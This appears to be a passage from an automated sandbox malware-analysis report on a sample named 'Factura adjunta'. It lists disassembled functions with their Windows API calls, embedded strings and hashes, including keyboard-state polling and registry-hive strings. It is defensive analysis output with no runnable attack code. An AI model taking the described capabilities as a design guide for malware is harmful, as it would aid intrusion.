                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                            • API String ID: 537147316-1018226102
                            • Opcode ID: c10ab7be9bb695d0c75d90db2445b99e5ebf87a313fd9d7eb059c8a3c4043ec7
                            • Instruction ID: 7243d1e6b87b2d7d6f977f572be3c0cf52bf5d8617679aa4e83db1b36cdc3056
                            • Opcode Fuzzy Hash: c10ab7be9bb695d0c75d90db2445b99e5ebf87a313fd9d7eb059c8a3c4043ec7
                            • Instruction Fuzzy Hash: 4F027971108381DFC724EF24C895AAFBBE5BF98314F04492DF586972A2DB38D949CB52
                            Function 007B45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 007B45F9
                            • GetMenuItemCount.USER32(00876890), ref: 007ED7CD
                            • GetMenuItemCount.USER32(00876890), ref: 007ED87D
                            • GetCursorPos.USER32(?), ref: 007ED8C1
                            • SetForegroundWindow.USER32(00000000), ref: 007ED8CA
                            • TrackPopupMenuEx.USER32(00876890,00000000,?,00000000,00000000,00000000), ref: 007ED8DD
                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007ED8E9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                            • String ID:
                            • API String ID: 2751501086-0
                            • Opcode ID: 742628eb060c59b66973b562f870aa5af0b622d03fe415cd33b7707166a0740f
                            • Instruction ID: 3cea098933f4d54e816586f7ac4f82d41513f337e93f58bd08782727fd7e40ca
                            • Opcode Fuzzy Hash: 742628eb060c59b66973b562f870aa5af0b622d03fe415cd33b7707166a0740f
                            • Instruction Fuzzy Hash: EB710670601255BAEB308F15DC49FEABF64FF09368F200216F614A61E2C7B95C60DB91
                            Function 008310A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00830038,?,?), ref: 008310BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                            • API String ID: 3964851224-909552448
                            • Opcode ID: a6b61dcada9170a19b12e8c2ad244a771864328ec6a7950f73ad8cc3199361da
                            • Instruction ID: 0d49c2bab014ee40d524c271d624c1a15cfacda8eac008456d40bd0e9bc27dbf
                            • Opcode Fuzzy Hash: a6b61dcada9170a19b12e8c2ad244a771864328ec6a7950f73ad8cc3199361da
                            • Instruction Fuzzy Hash: 5D414C3021024EDBCF10EFA0D899AEE3725FF91704F105466ED91DB292DB34A95ACBE0
                            Function 008373C1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 008373D9
                            • CreateMenu.USER32 ref: 008373F4
                            • SetMenu.USER32(?,00000000), ref: 00837403
                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00837490
                            • IsMenu.USER32(?), ref: 008374A6
                            • CreatePopupMenu.USER32 ref: 008374B0
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008374DD
                            • DrawMenuBar.USER32 ref: 008374E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                            • String ID: 0$F$h)
                            • API String ID: 176399719-245991760
                            • Opcode ID: aaec4712495159736b62b7cf101ff2a9505ef1169571ad32defb42a06f43b090
                            • Instruction ID: 503aac9b035849da892801fa032164c328898f04d4e28ba127165dc1d21c91ea
                            • Opcode Fuzzy Hash: aaec4712495159736b62b7cf101ff2a9505ef1169571ad32defb42a06f43b090
                            • Instruction Fuzzy Hash: A34158B5A01209EFDB20DF64D888E9ABBB5FF89300F144429FA55D7361D730E924CB94
                            Function 00815569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B7D2C: _memmove.LIBCMT ref: 007B7D66
                              • Part of subcall function 007B7A84: _memmove.LIBCMT ref: 007B7B0D
                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008155D2
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008155E8
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008155F9
                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0081560B
                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0081561C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: SendString$_memmove
                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                            • API String ID: 2279737902-1007645807
                            • Opcode ID: 4a10d1d8359a3fc2538d79c78c091a9e7a07b980ddf80df4db9c578cd1b9fd0c
                            • Instruction ID: 9958fda9d3df890860b7c3dbf7e6005fe78fd6765cb4fc75e6bfdf4d2f5c13d5
                            • Opcode Fuzzy Hash: 4a10d1d8359a3fc2538d79c78c091a9e7a07b980ddf80df4db9c578cd1b9fd0c
                            • Instruction Fuzzy Hash: 00119420A50169F9D728B6A5CC8EEFFBB7CFFD1B00F400469B411E22D1DEA85D45C9A1
                            Function 008148F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                            • String ID: 0.0.0.0
                            • API String ID: 208665112-3771769585
                            • Opcode ID: a0fba01baed9028e64acc279f1e7884d39f670521f548ecd22d8e38e05c94dac
                            • Instruction ID: c792f52967014d34f947c9eae662304d2e8690283e22933e164f4b970b7dfe64
                            • Opcode Fuzzy Hash: a0fba01baed9028e64acc279f1e7884d39f670521f548ecd22d8e38e05c94dac
                            • Instruction Fuzzy Hash: A611E731904114EBCB24EB64ED0AEDB7BBCFF40710F040576F549D62A2EF749AC68AA1
                            Function 00815217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • timeGetTime.WINMM ref: 0081521C
                              • Part of subcall function 007D0719: timeGetTime.WINMM(?,7694B400,007C0FF9), ref: 007D071D
                            • Sleep.KERNEL32(0000000A), ref: 00815248
                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0081526C
                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0081528E
                            • SetActiveWindow.USER32 ref: 008152AD
                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008152BB
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 008152DA
                            • Sleep.KERNEL32(000000FA), ref: 008152E5
                            • IsWindow.USER32 ref: 008152F1
                            • EndDialog.USER32(00000000), ref: 00815302
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                            • String ID: BUTTON
                            • API String ID: 1194449130-3405671355
                            • Opcode ID: cd38615155d244d8b77a83a7aa6600dbafade0f255c49caf29bc516c3f7e05dc
                            • Instruction ID: f5fbee4c54f95e89ca5b0c740c83a8418f409ffc29ee4c676438ed9c93dcdc43
                            • Opcode Fuzzy Hash: cd38615155d244d8b77a83a7aa6600dbafade0f255c49caf29bc516c3f7e05dc
                            • Instruction Fuzzy Hash: CA215071504604EFE7015F60ED8DA693B6DFF95346B041828F109C2276EB759CD0CAA2
                            Function 0081052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 008105A7
                            • SetKeyboardState.USER32(?), ref: 00810612
                            • GetAsyncKeyState.USER32(000000A0), ref: 00810632
                            • GetKeyState.USER32(000000A0), ref: 00810649
                            • GetAsyncKeyState.USER32(000000A1), ref: 00810678
                            • GetKeyState.USER32(000000A1), ref: 00810689
                            • GetAsyncKeyState.USER32(00000011), ref: 008106B5
                            • GetKeyState.USER32(00000011), ref: 008106C3
                            • GetAsyncKeyState.USER32(00000012), ref: 008106EC
                            • GetKeyState.USER32(00000012), ref: 008106FA
                            • GetAsyncKeyState.USER32(0000005B), ref: 00810723
                            • GetKeyState.USER32(0000005B), ref: 00810731
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: e6a4b8515a922ce6952feb30eaaf66c8c962aeaf0b6e466bcf359ab3af970f91
                            • Instruction ID: f8b1bc7a9b0e5bc3b0c19694319e8183bdccdc4e62a882f9fe2660fe09cf0183
                            • Opcode Fuzzy Hash: e6a4b8515a922ce6952feb30eaaf66c8c962aeaf0b6e466bcf359ab3af970f91
                            • Instruction Fuzzy Hash: 5551DB60A0478829FF34DBA48C557EABFBDFF51340F08859A95C2D61C2DA949ACCCF52
                            Function 0080C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                            Download Yara Rule
                            APIs
                            • GetDlgItem.USER32(?,00000001), ref: 0080C746
                            • GetWindowRect.USER32(00000000,?), ref: 0080C758
                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0080C7B6
                            • GetDlgItem.USER32(?,00000002), ref: 0080C7C1
                            • GetWindowRect.USER32(00000000,?), ref: 0080C7D3
                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0080C827
                            • GetDlgItem.USER32(?,000003E9), ref: 0080C835
                            • GetWindowRect.USER32(00000000,?), ref: 0080C846
                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0080C889
                            • GetDlgItem.USER32(?,000003EA), ref: 0080C897
                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0080C8B4
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0080C8C1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$ItemMoveRect$Invalidate
                            • String ID:
                            • API String ID: 3096461208-0
                            • Opcode ID: a36a3834fb57bf8bdb85e40a249fefd8ea3f33dc369fc12c5af8a80dcbb00d86
                            • Instruction ID: d8c767634aab35239e8790483543dcd3968e42997d94a483605fbbe510f34ad1
                            • Opcode Fuzzy Hash: a36a3834fb57bf8bdb85e40a249fefd8ea3f33dc369fc12c5af8a80dcbb00d86
                            • Instruction Fuzzy Hash: 74513071B00205ABDB18CFA9DD89AAEBBB6FF98311F14863DF615D62D1D7709D008B50
                            Function 0081AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                            Download Yara Rule
                            APIs
                            • CharLowerBuffW.USER32(?,?,0083F910), ref: 0081AB76
                            • GetDriveTypeW.KERNEL32(00000061,0086A620,00000061), ref: 0081AC40
                            • _wcscpy.LIBCMT ref: 0081AC6A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: BuffCharDriveLowerType_wcscpy
                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                            • API String ID: 2820617543-1000479233
                            • Opcode ID: 11ff5808f47f47c5d9d19fb57178693b37a6790b8c1ba00aa3673ad12cb0dab3
                            • Instruction ID: b702e96878b13ff0c002f7c148f7b05d339e25315cf66ced26151bc43b29d7ce
                            • Opcode Fuzzy Hash: 11ff5808f47f47c5d9d19fb57178693b37a6790b8c1ba00aa3673ad12cb0dab3
                            • Instruction Fuzzy Hash: 0F51B330108345DBC718EF64C895AEAB7A9FF80714F10481EF596D72A2DB35DD49CA93
                            Function 007B201B Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 170timeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007B2036,?,00000000,?,?,?,?,007B16CB,00000000,?), ref: 007B1B9A
                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007B20D3
                            • KillTimer.USER32(-00000001,?,?,?,?,007B16CB,00000000,?,?,007B1AE2,?,?), ref: 007B216E
                            • DestroyAcceleratorTable.USER32(00000000), ref: 007EBEF6
                            • DeleteObject.GDI32(00000000), ref: 007EBF6C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                            • String ID: h)
                            • API String ID: 2402799130-3328819710
                            • Opcode ID: e7d475b52a88f08b9f1911bcccb09d79387e46ca19bca0c51176b52b7bbda319
                            • Instruction ID: 8ee385bd2f4b2763b976fbe114d6375a671568fab3338ee6f842b715ba0ade2c
                            • Opcode Fuzzy Hash: e7d475b52a88f08b9f1911bcccb09d79387e46ca19bca0c51176b52b7bbda319
                            • Instruction Fuzzy Hash: 2061AD30502A44DFCB29AF19CD48B6ABBF1FF44312F10892DE14686966D739E892DF91
                            Function 008388B4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                            Download Yara Rule
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0083896E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: InvalidateRect
                            • String ID: h)
                            • API String ID: 634782764-3328819710
                            • Opcode ID: fe5f8c5feacce911692e19402665fe207c24076fdf6f6b24228ed5f95eb2956a
                            • Instruction ID: fa8c7a5934a6b2e783e33bd961af17a09ebf7949e15a1800f8fdc773ac9b3d3c
                            • Opcode Fuzzy Hash: fe5f8c5feacce911692e19402665fe207c24076fdf6f6b24228ed5f95eb2956a
                            • Instruction Fuzzy Hash: 2051B430600318FFDF249F28CC89BA93B65FB84354F604522F915E66A1DFB5A994DBC2
                            Function 007B9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __i64tow__itow__swprintf
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 421087845-2263619337
                            • Opcode ID: 4d9f2519e3c6396b34b9394bbbe256af29aa7065134f6501abc5ebb18644494f
                            • Instruction ID: 6ac7ad54ae7545600bc6f3a730eaa93ab6df0b756563a5f370816bd6ad50c6d7
                            • Opcode Fuzzy Hash: 4d9f2519e3c6396b34b9394bbbe256af29aa7065134f6501abc5ebb18644494f
                            • Instruction Fuzzy Hash: F741E571604205EFDB24AF39DC46FB677F8EB48300F24446FE699D7292EA39A941CB11
                            Function 0083772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                            Download Yara Rule
                            APIs
                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008377CD
                            • CreateCompatibleDC.GDI32(00000000), ref: 008377D4
                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008377E7
                            • SelectObject.GDI32(00000000,00000000), ref: 008377EF
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 008377FA
                            • DeleteDC.GDI32(00000000), ref: 00837803
                            • GetWindowLongW.USER32(?,000000EC), ref: 0083780D
                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00837821
                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0083782D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                            • String ID: static
                            • API String ID: 2559357485-2160076837
                            • Opcode ID: a62c338f61bd80769461903c10702bcd948e866af71b8b31220f306f03983ad6
                            • Instruction ID: 8305e4131feac0fdc72b14301deafebbadce9a059304d7ffeae901574869e58f
                            • Opcode Fuzzy Hash: a62c338f61bd80769461903c10702bcd948e866af71b8b31220f306f03983ad6
                            • Instruction Fuzzy Hash: 2031A872500215ABDF229FA8DC09FEA3B69FF89361F100624FA15E20A1D731D821DBE4
